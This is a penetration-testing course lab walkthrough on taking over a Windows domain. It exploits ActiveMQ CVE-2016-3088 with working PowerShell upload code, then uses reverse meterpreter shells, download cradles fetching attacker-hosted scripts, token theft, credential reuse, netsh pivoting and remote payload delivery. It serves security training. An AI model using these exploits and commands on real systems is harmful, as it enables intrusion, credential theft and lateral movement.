
© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and Lateral Movement
For your second engagement, you have been tasked to conduct another external penetration
test against an organization whose publicly-facing IP address range is 172.17.80.0/24.

Your tester IP address is within the 175.13.80.0/24 range.

Task: Perform remote exploitation and post-exploitation tasks on vulnerable external
systems, gain access to the internal net block leveraging PowerShell and related tools for as
many tasks as possible, and ultimately obtain Domain Administrator status within the
ELS-CHILD domain by pivoting through the environment.

Network Diagram:

• Identify vulnerabilities from a remote exploitation perspective.
• Exploit discovered vulnerabilities.
• Obtain access to machines on other internal subnets.
• Use PowerShell and related tools for tasks where applicable.
• Obtain Domain Administrator privileges by pivoting through the internal network.

• PowerShell
• Nmap
• Metasploit

One or more of the systems on the external IP range contains a vulnerability or
misconfiguration. Identify the vulnerability or misconfiguration, obtain access to the
vulnerable target, and obtain a meterpreter shell back to your attacker system.

Using your access on the vulnerable publicly-facing target, use that machine as a pivot to
enumerate the internal network, conduct local enumeration of the compromised target, and
additionally identify a domain controller.

Using information obtained via recon of the initially compromised system, use Metasploit
and PowerShell-related tools to execute commands on a Domain Controller, ultimately
resulting in a meterpreter session on the Domain Controller as an administrative user.

Below, you can find solutions for each of the exploitation tasks in this lab. Remember,
though, that you can follow your own strategy (which may differ from the one explained
below).

The first step of any external or internal penetration test is identifying live hosts within
the provided target IP range. We first execute an nmap ping scan against the external CIDR
block. Note that, run as root, -sn sends ICMP echo and timestamp requests plus TCP probes to
ports 80 and 443; a host that drops all of those will be missed, in which case a port scan of
the whole range is the fallback.

# nmap -sn 172.17.80.0/24

We identify two live systems; our focus will be on the 172.17.80.100 machine.

We run a port scan for all TCP ports against that host:

# nmap -sS -p- 172.17.80.100 --open -n

We identify an interesting open port, TCP 8161. A version scan shows that it is HTTP, and
browsing to the IP and port confirms that an installation of Apache ActiveMQ is running
there.

# nmap -sS 172.17.80.100 -sV --version-all -p 8161

Clicking the "Manage ActiveMQ Broker" link in the screenshot above prompts us for HTTP
Basic authentication. After some cursory research on this application, we find that some
versions ship with the default credentials admin/admin. We try those credentials and are
logged into the console, where we can identify the exact version, 5.11.1.

Upon additional research of this specific version, we find that it is affected by
CVE-2016-3088 (https://www.cvedetails.com/cve/CVE-2016-3088/): the ActiveMQ Fileserver web
application lets an attacker upload an arbitrary file with an HTTP PUT request and then
relocate it with an HTTP MOVE request into a directory from which it is served and executed
as JSP, yielding remote code execution.

The CVE entry also tells us there is a Metasploit module. However, that module, in certain
environments, does not work correctly or is unstable, so we search GitHub for the CVE in
question and find another suitable exploit script, which we will use against this service:

https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/ActiveMQExP/ActiveMQExPV1.0.py

Reading the Python code of the exploit, or simply running it, shows that we also need the
"cmd.jsp" file, which can be found in the same GitHub repository.

Once we’ve downloaded both the script and cmd.jsp file, we can use the following command
to exploit the ActiveMQ service:

# python ActiveMQExPV1.0.py -url http://172.17.80.100:8161/ -user admin -pass


admin -shell cmd.jsp
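To make clear what the PoC script is doing on the wire, here is the same PUT-then-MOVE sequence written out as an added example (not the page's script and not the coffeehb PoC). It is written in PowerShell with .NET HttpWebRequest so it runs from either Windows PowerShell or pwsh. The target URL and admin/admin credentials are the lab's; the broker's install directory (C:/apache-activemq-5.11.1) is an assumption inferred from the shell's working directory seen later in the lab, and should be confirmed from the console's system properties page before use, since the MOVE needs an absolute destination path.

```powershell
# Added example: the PUT + MOVE primitive behind CVE-2016-3088, step by step.
# Assumptions (not from the page): the fileserver webapp is enabled, and activemq.home on the
# target is C:/apache-activemq-5.11.1 (inferred from the lab's shell prompt; confirm first).
param(
    [string]$BaseUrl = 'http://172.17.80.100:8161',
    [string]$User    = 'admin',
    [string]$Pass    = 'admin',
    [string]$JspFile = '.\cmd.jsp',
    [string]$HomeDir = 'C:/apache-activemq-5.11.1'   # assumed activemq.home, forward slashes
)

$auth = 'Basic ' + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${User}:${Pass}"))

function Send-ActiveMqRequest {
    # Minimal HTTP client that returns the status code; MOVE is not a verb Invoke-WebRequest
    # can send on Windows PowerShell 5.1, so HttpWebRequest is used directly.
    param([string]$Method, [string]$Url, [hashtable]$Headers = @{}, [byte[]]$Body)
    $req = [Net.HttpWebRequest]::Create($Url)
    $req.Method  = $Method
    $req.Timeout = 15000
    $req.Headers['Authorization'] = $auth
    foreach ($k in $Headers.Keys) { $req.Headers[$k] = $Headers[$k] }
    if ($Body) {
        $req.ContentLength = $Body.Length
        $s = $req.GetRequestStream(); $s.Write($Body, 0, $Body.Length); $s.Close()
    }
    try   { $resp = $req.GetResponse() }
    catch [Net.WebException] { $resp = $_.Exception.Response }
    if (-not $resp) { return -1 }           # no HTTP answer at all (refused, timed out)
    $code = [int]$resp.StatusCode
    $resp.Close()
    return $code
}

$stage = "$BaseUrl/fileserver/$(Get-Random).txt"
$body  = [IO.File]::ReadAllBytes((Resolve-Path $JspFile))

# 1. PUT the JSP into the fileserver webapp under an inert .txt name; the servlet stores it
$put = Send-ActiveMqRequest -Method 'PUT' -Url $stage -Body $body

# 2. MOVE it into a webapp that compiles JSP. The Destination header accepts a file:// URI
#    pointing anywhere on disk, which is the actual flaw.
$dest = "file:///$HomeDir/webapps/api/cmd.jsp"
$mov  = Send-ActiveMqRequest -Method 'MOVE' -Url $stage -Headers @{ Destination = $dest }

# 3. Check that the moved file is now served as a page rather than as a static file
$get  = Send-ActiveMqRequest -Method 'GET' -Url "$BaseUrl/api/cmd.jsp"

"PUT={0} MOVE={1} GET={2}" -f $put, $mov, $get
if ($put -eq 204 -and $mov -eq 204 -and $get -eq 200) {
    "JSP shell staged at $BaseUrl/api/cmd.jsp"
} else {
    "Staging failed; check the fileserver is enabled and that $HomeDir is the real install path"
}
```

Both the PUT and the MOVE return 204 No Content on success, so the status codes, not the bodies, are what to watch. If the MOVE returns 204 but the GET does not return 200, the destination path is wrong, which is the usual reason the public PoC "doesn't work" on a given install.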

The exploit, when successful, prints a URL we can browse to (as seen above), which is a
JSP-based command shell:

Obtaining a PowerShell-based meterpreter session from this command shell is straightforward
at this point. In the last lab, we used the Metasploit web_delivery module to generate a
PowerShell one-liner, of which we used only the URL portion. This time, we will use the
entire PowerShell one-liner and execute it through the new ActiveMQ command shell.

First, we configure our web_delivery module to generate a PowerShell one-liner:

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 175.13.80.16
msf exploit(multi/script/web_delivery) > set LPORT 4444
msf exploit(multi/script/web_delivery) > set SRVHOST 175.13.80.16
msf exploit(multi/script/web_delivery) > set ExitOnSession False
msf exploit(multi/script/web_delivery) > exploit -j

Next, we’ll copy the entire powershell command as seen in the above web_delivery module
output, and run that in the ActiveMQ command shell we obtained:

Upon clicking the “Send” button, we should get a meterpreter shell back to our listener:

And also, we confirm that it is a SYSTEM shell:

msf exploit(multi/script/web_delivery) > sessions -l

Now that we have access to the first compromised machine, we can configure it as a pivot.
We could run the autoroute post module against the session as we have done previously, but
we can also do this from within meterpreter:

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run autoroute -s 10.100.11.0/24

Since we’re SYSTEM, at this point, we may be able to use some built-in meterpreter
commands to further our objectives in ultimately getting access to a Domain Controller. First,

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 12
Lateral Movement
we load the “incognito” extension, and list any available tokens we may be able to use for
impersonation:

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

We can see in the list_tokens -u output above that several Delegation Tokens are available
to us. That distinction matters: only a delegation-level token can be used to authenticate
to remote systems, whereas an impersonation-level token works on the local host only. We
are interested in the ELS-CHILD\local_admin token, since it will allow us to enumerate the
Domain Controller.

Let’s impersonate that token:

meterpreter > impersonate_token ELS-CHILD\\local_admin

Now that we’re impersonating the local_admin for the ELS-CHILD domain, we can conduct
some cursory enumeration using some PowerShell modules from the PowerSploit
framework. Specifically, let’s make sure we have the PowerView.ps1 script from the
PowerSploit framework downloaded onto our target machine. We’ll then want to as we did
in the previous powershell lab, serve that ps1 script using a python SimpleHTTPServer.

# python -m SimpleHTTPServer 8000

Once we’ve set up, our simple HTTP server can run some powershell download cradles from
the meterpreter shell. First, we drop into a shell with the “shell” command:

meterpreter > shell

Next, we run the following two commands in that shell. The first identifies a Domain
Controller, and the second determines which hosts the "local_admin" user has local
administrator access on, the Domain Controller included:

C:\apache-activemq-5.11.1\bin\win64> powershell "IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.16:8000/PowerView.ps1'); Get-NetDomainController"

C:\apache-activemq-5.11.1\bin\win64> powershell "IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.16:8000/PowerView.ps1'); Find-LocalAdminAccess"
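The two cradles above download PowerView twice and scan every computer in the domain the second time. As an added example (not part of the lab), the same enumeration can be done in one pass from a script served next to PowerView.ps1, with a check up front that the impersonated token actually reached this process, since a cradle run as SYSTEM instead of the domain user silently returns nothing useful. It uses PowerView's Get-NetDomainController and Invoke-CheckLocalAdminAccess; the server URL is the lab's.

```powershell
# Added example: one-pass enumeration from the impersonated shell. Assumes PowerView.ps1 is
# served at http://175.13.80.16:8000/ as in the lab; run it from the meterpreter "shell" with
#   powershell -ExecutionPolicy Bypass -File .\enum.ps1   (or paste it into that shell).

# 1. Confirm we are running under the delegation token, not SYSTEM. The meterpreter "shell"
#    inherits the impersonated token, so this should read ELS-CHILD\local_admin.
$me = [Security.Principal.WindowsIdentity]::GetCurrent().Name
if ($me -notlike 'ELS-CHILD\*') {
    throw "Running as $me rather than a domain token; impersonate_token again before enumerating"
}
"Enumerating as $me"

# 2. Load PowerView once for the whole run.
IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.16:8000/PowerView.ps1')

# 3. Domain controllers for the current domain (name, address, OS).
$dcs = Get-NetDomainController
$dcs | Select-Object Name, IPAddress, OSVersion | Format-Table -AutoSize

# 4. Test local admin access on the DCs only, rather than sweeping the whole domain with
#    Find-LocalAdminAccess; each probe is an SMB connection to the target, so keep it targeted.
$adminOn = foreach ($dc in $dcs) {
    if (Invoke-CheckLocalAdminAccess -ComputerName $dc.Name) { $dc.Name }
}
if ($adminOn) { "Local admin on: $($adminOn -join ', ')" } else { "No local admin access on any DC" }
```

Invoke-CheckLocalAdminAccess works by opening the remote Service Control Manager with full rights, which only succeeds for local administrators; that is the same test Find-LocalAdminAccess runs across every domain computer, so restricting it to the DCs is both faster and quieter.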

We now know that our current user, ELS-CHILD\local_admin, is a local administrator of the
Domain Controller. Good news!

Our next step is to set up a portproxy so we can pivot from this host to another machine
that has direct access to the domain controller. Configuring a portproxy requires elevated
privileges on the pivot, and we are currently ELS-CHILD\local_admin because of the token
impersonation, so we first send the channel to the background with CTRL-Z and then run
rev2self, which returns us to SYSTEM:

C:\apache-activemq-5.11.1\bin\win64> ^Z
Background channel 1? [y/N] y
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now that we’re back to SYSTEM let’s conduct some enumeration before we configure our
portproxy. We can use the “search” command from inside meterpreter, to find any text files,
which we’ve seen in the past, and is a good step in looking for sensitive information on a
compromised host:

meterpreter > search -f *.txt

One of the first files we discover as a result of the search command is a “uat_test_account.txt”
file. This sounds ripe for the picking. Let’s download it.

meterpreter > download c:\\UAT\\uat_test_account.txt /tmp/

We have now found credentials in a text file on a compromised machine, which is a frequent
occurrence in the real world. Always search for files that might contain credentials.

Before we move forward, we need to find a system that has direct access to the domain
controller, i.e. a system connected to the 10.100.10.0/24 subnet, which our earlier recon
showed to be the Domain Controller's subnet. We first need to identify such a system.

Let's background our meterpreter session and use a post module to ARP-scan the
10.100.11.0/24 subnet from the Windows 7 session we currently hold, looking for another host
we can use as a pivot to execute commands on the domain controller:

meterpreter > background
msf > use post/windows/gather/arp_scanner
msf post(windows/gather/arp_scanner) > set RHOSTS 10.100.11.0/24
msf post(windows/gather/arp_scanner) > set SESSION 1
msf post(windows/gather/arp_scanner) > run

We have identified another system on the 10.100.11.0/24 network, 10.100.11.100. Assuming
it is domain-joined, we can try our ELS-CHILD\local_admin credentials against it in
conjunction with Metasploit's powershell_remoting module.

First, let's set up the portproxy we planned earlier, so that the new system's callback can
bounce off the Windows 7 machine (10.100.11.101) to our handler on 175.13.80.16:

msf post(windows/gather/arp_scanner) > use post/windows/manage/portproxy
msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.13.80.16
msf post(windows/manage/portproxy) > set CONNECT_PORT 4444
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101
msf post(windows/manage/portproxy) > set LOCAL_PORT 4444
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run
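What the portproxy module sets up is a netsh port forward on the pivot. The following is an added example (not the lab's module) of doing the same by hand from an elevated PowerShell on the Windows 7 pivot, together with the two checks the module does not give you: that the IP Helper service the forwarder depends on is running, and that the listener is actually bound and reachable through the host firewall. The addresses and ports are the lab's; the firewall rule name is arbitrary.

```powershell
# Added example: manual equivalent of post/windows/manage/portproxy on the Windows 7 pivot.
# Must run elevated (SYSTEM or an administrator). Values are the lab's.
$ListenAddr  = '10.100.11.101'; $ListenPort  = 4444   # where the Windows 10 host will call back
$ConnectAddr = '175.13.80.16';  $ConnectPort = 4444   # the web_delivery handler on the attacker box

# netsh portproxy is implemented by the IP Helper service; if it is stopped the rule is
# accepted but nothing ever listens, which looks exactly like a payload that never fires.
Start-Service iphlpsvc -ErrorAction SilentlyContinue

netsh interface portproxy add v4tov4 listenaddress=$ListenAddr listenport=$ListenPort `
    connectaddress=$ConnectAddr connectport=$ConnectPort

# The host firewall is a separate gate; allow the listener explicitly (rule name is arbitrary).
netsh advfirewall firewall add rule name=portproxy-pivot dir=in action=allow `
    protocol=TCP localport=$ListenPort

# Verify: the rule is registered AND a socket is bound on the listen address.
netsh interface portproxy show v4tov4
$bound = netstat -ano | Select-String "${ListenAddr}:${ListenPort}\s+\S+\s+LISTENING"
if ($bound) { "Forwarder listening on ${ListenAddr}:${ListenPort}" }
else        { "No listener bound; check that iphlpsvc started and the add command succeeded" }

# Cleanup once the engagement step is done (leave no forwarders behind on client systems):
#   netsh interface portproxy delete v4tov4 listenaddress=$ListenAddr listenport=$ListenPort
#   netsh advfirewall firewall delete rule name=portproxy-pivot
```

The forward is per-listen-address: a second hop that should call back to a different address on the pivot needs its own v4tov4 entry. Record every entry you add so it can be removed in the cleanup phase.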

Now that the portproxy is configured, we can use the ELS-CHILD\local_admin credentials to
run the powershell_remoting exploit against the newly identified system. Note that LHOST
and LPORT point at the portproxy on the Windows 7 pivot, which forwards the connection on
to our handler at 175.13.80.16:4444:

msf post(windows/manage/portproxy) > use exploit/windows/local/powershell_remoting
msf exploit(windows/local/powershell_remoting) > set SESSION 1
msf exploit(windows/local/powershell_remoting) > set SMBUSER local_admin
msf exploit(windows/local/powershell_remoting) > set SMBPASS P@ssw0rd123
msf exploit(windows/local/powershell_remoting) > set SMBDOMAIN ELS-CHILD
msf exploit(windows/local/powershell_remoting) > set RHOSTS 10.100.11.100
msf exploit(windows/local/powershell_remoting) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/powershell_remoting) > set LHOST 10.100.11.101
msf exploit(windows/local/powershell_remoting) > set LPORT 4444
msf exploit(windows/local/powershell_remoting) > exploit -j

At this point, we should have a meterpreter session back from the Windows 10 machine,
which is directly connected to the same network as the domain controller.

We now have two active sessions, one from the Windows 7 pivot machine as SYSTEM, and
another as the ELS-CHILD\local_admin user on the Windows 10 machine.

Now that we have a meterpreter session on a system on the same net as the DC, we can use
the same powershell_remoting technique to execute commands on the Domain Controller as
the “ELS-CHILD\local_admin” user.

Let’s modify our powershell_remoting exploit to use our new SESSION on the Windows 10
machine, and also set our RHOST to the IP address of the domain controller so we can launch
a powershell payload on the DC via powershell remoting:

msf exploit(windows/local/powershell_remoting) > set SESSION 2
msf exploit(windows/local/powershell_remoting) > set RHOSTS 10.100.10.253
msf exploit(windows/local/powershell_remoting) > exploit -j
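Both powershell_remoting runs above (against 10.100.11.100 and then against the DC) rely on WinRM accepting the ELS-CHILD\local_admin credentials and running a script block on the target. As an added example, not the lab's own code, here is the same thing done by hand from the Windows 10 session against the DC, with the pre-flight checks that explain most failures of that module: connecting by IP address forces NTLM, which the WinRM client refuses unless the address is in its TrustedHosts list, and the credentials should be proven to work (and to be administrative on the target) before a payload is sent. The DC address and credentials are the lab's; the attribute names in the returned object are mine.

```powershell
# Added example: manual equivalent of exploit/windows/local/powershell_remoting, run from the
# session on the Windows 10 host (10.100.11.100) against the DC. Requires an elevated shell
# for the TrustedHosts change. Values are the lab's.
$Target = '10.100.10.253'
$Cred   = New-Object System.Management.Automation.PSCredential(
    'ELS-CHILD\local_admin', (ConvertTo-SecureString 'P@ssw0rd123' -AsPlainText -Force))

# Connecting by IP means NTLM rather than Kerberos; the WinRM client only allows that over
# HTTPS or for hosts in TrustedHosts. -Concatenate keeps any entries already present.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $Target -Concatenate -Force

# Pre-flight 1: is WinRM (TCP 5985) answering from this hop at all?
if (-not (Test-WSMan -ComputerName $Target -ErrorAction SilentlyContinue)) {
    throw "WinRM on $Target is not reachable from $env:COMPUTERNAME"
}

# Pre-flight 2: do the credentials log on? New-PSSession throws on an access-denied.
$sess = New-PSSession -ComputerName $Target -Credential $Cred

# Prove where we landed and with what rights before sending anything noisier.
Invoke-Command -Session $sess -ScriptBlock {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        Host    = $env:COMPUTERNAME
        User    = $id.Name
        IsAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        IsDC    = (Get-WmiObject Win32_ComputerSystem).DomainRole -ge 4   # 4 = backup DC, 5 = primary DC
    }
}

# Payload delivery: the Metasploit module does this same Invoke-Command with its generated
# payload as the script block. Set $PayloadCommand to the web_delivery one-liner copied from
# the msf console to fire it; it will call back to the portproxy on 10.100.11.101:4444.
$PayloadCommand = $null
if ($PayloadCommand) {
    Invoke-Command -Session $sess -ScriptBlock {
        param($c) Start-Process powershell.exe -ArgumentList '-nop', '-w', 'hidden', '-c', $c
    } -ArgumentList $PayloadCommand
}
Remove-PSSession $sess
```

If IsAdmin comes back False while the logon succeeded, the account is a domain user without local administrator rights on that host and the payload would run unprivileged; that is the case Find-LocalAdminAccess was meant to rule out earlier in the lab.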

And we should now have a meterpreter session on the Domain Controller:
